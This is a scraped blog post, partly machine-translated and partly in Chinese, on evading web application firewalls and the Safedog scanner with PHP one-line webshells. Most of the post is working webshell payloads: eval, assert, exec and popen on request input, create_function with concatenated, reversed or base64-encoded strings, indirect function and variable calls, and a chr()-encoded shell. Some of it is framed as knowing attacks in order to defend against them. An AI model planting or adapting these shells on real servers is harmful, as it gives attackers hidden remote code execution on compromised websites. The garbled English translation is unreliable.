PHP-WebShell-Bypass-WAF

Others 2019-10-20 09:55:46 views: null

PHP-WebShell-Bypass-WAF

PHP WebShell sentence structure is: input and execution, this is a classic word PHP Code:

    <?php eval($_GET['test']); ?> <?php eval($_POST['test']); ?>

WebShell input points in the $ _GET and $ _POST, enforcement points in eval (), classic phrase WAF will intercept

test:<?php eval($_GET['test']); ?>

test:<?php $_GET['test']; ?>

test:<?php eval(); ?>

Integrated the above three points, WAF can be found through keyword blocking, these three test cases to the test under secure dog

Can be found, the dog is to identify WebShell security through comprehensive judgment, now, we have two ways of bypassing: keyword bypass and bypass the confusion

Keyword bypass

In general, blocking rules inside WAF is used to match the regular, bypassing the first idea: Looking for WAF interception inside there is no matching keyword

Test Case:<?php%20assert('$code='.$_REQUEST['code']);$code();%20?>

Test Case:<?php%20$file=file_put_contents('code.php','<?php%20'.$_REQUEST['code'].'%20?>');include%20'code.php';%20?>

Test Case:<?php%20exec($_REQUEST['code']);%20?>

Test Case:<?php%20$handle=popen($_REQUEST['code'],'r');echo%20fread($handle,1024*4);?>

Test Case:<?php%20$function=create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();%20?>

1 summarizes the idea: not possible to find more intercepted function, and then to test

Later, these keywords are fill up the strategy, then we use the confusion to bypass keyword detection

Confusion bypass

create_function() More interesting is the prototype of a function, the function is: Link

    string create_function ( string $args , string $code )

The first argument is a list of parameters required for the function, the second argument to the function code, and finally returns a function object, then call again. (The second constructor parameter) can have many different methods of confusion at the time of construction code

    eval($_GET['test']);

通过很多不同种类的字符串变化成下面的例子

    'ev'.'al'.'($_G'.'ET['.'"test"]);'  strrev('$(lave').'_G'.'ET['.'"test"]);';  base64_decode('ZXZhbCgkX0dFVFsidGVzdCJdKTs=');

这样的变化是非常多的,用云WAF 和安全狗测试一下:

    <?php $function=create_function('$code','ev'.'al'.'($_G'.'ET['.'"test"]);') ?> <?php $function=create_function('$code',strrev('$(lave').'($_G'.'ET['.'"test"]);') ?> <?php $function=create_function('$code',base64_decode('ZXZhbCgkX0dFVFsidGVzdCJdKTs=')) ?>

腾讯云WAF 的策略是把create_function() 当作敏感函数拦截了,这三个WebShell 安全狗也都全部杀掉,先从安全狗开始尝试绕过.

首先使用一个空的create_function() 尝试看看安全狗有没有杀掉

create_function() 填充一些可以执行的代码,安全狗也没有杀.

填充eval($_GET['test']) ,发现安全狗识别出WebShell

使用混淆'ev'.'al'.'($_G'.'ET['.'"code"'.']);' 也同样可以被识别

使用strrev('ve').strrev('la').base64_decode('KCRfR0VUWw==').'"code"'.']);'; 也还是可以别识别

不过不要灰心,PHP 是很灵活的语言,变化的花样很多,试试这样写,就可以绕过安全狗的扫描了

做一句话WAF 绕过和免杀,一定要相信自己,AV 和WAF 除了用关键字和综合判断来识别WebShell ,终会有办法绕过的.现在过狗,接下来介绍一下间接调用函数与间接引用变量.

间接调用函数

PHP 里边有个语法是$function='eval'; ,然后就可以直接对$function 变量进行函数调用,语法是$function().基于这一点,我们回过头来绕过云WAF

Payload:

    <?php $function='create'.'_function';$function=$function('$code','ev'.'al'.'($_'.'GET'.'["code"]);');$function();?>

间接调用变量

PHP 还有一个语法是$$ 间接引用变量,比如:$test=1234;$reference='test';echo $$reference; 这样使用,reference 变量里边保存test 变量的名字,然后用符号$$ 即可引用到变量test .这样有什么意义呢?因为WAF 和AV 会通过$_GET ,$_POST 来判断WebShell ,不妨回到云WAF 再看看

使用$$ 来绕过,Payload 如下:

    <?php $a = '_GET';echo $$a['test']; // 云WAF 规则已经更新,<?php ?> 会被拦截,所以去掉?> 即可绕过,由此判断是正则匹配,可以开开脑洞发挥一下绕过正则判断

这样就可以绕过对$_GET ,$_POST 的检测,同样,还有$_REQUESTS ,$_COOKIE

文末总结

到了这里,举一些不错的一句话木马来分析一下原理,推荐深入研究的读者访问这里Link

    <?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>

这个WebShell 使用到array_map() 和ass\x65rt ,array_map() 是调用函数的,第一个参数是即将要调用的函数名,这里ass\x65rt 使用了编码绕过,绕过了字符串判断,第二个参数是传递给这个函数的参数

    <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

这个WebShell 使用到了间接引用函数,$_uU 重定向到chr() ,;$_cC 最后解码为eval($_POST[1]); ,$_fF 解码为create_function ,最后就是create_function 的调用过程,和php-shell-create_function.php 原理一样

未知攻,焉知防,这个是关于PHP Shell 的一句话检测脚本Link,很多绕过的思路都是在做防御的时候想到的,没有绝对的防御,甚至是看起来正确的思路在代码实现的过程中会存在Bug 导致分析或者识别失败

Guess you like

Origin www.cnblogs.com/0daybug/p/11706673.html
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com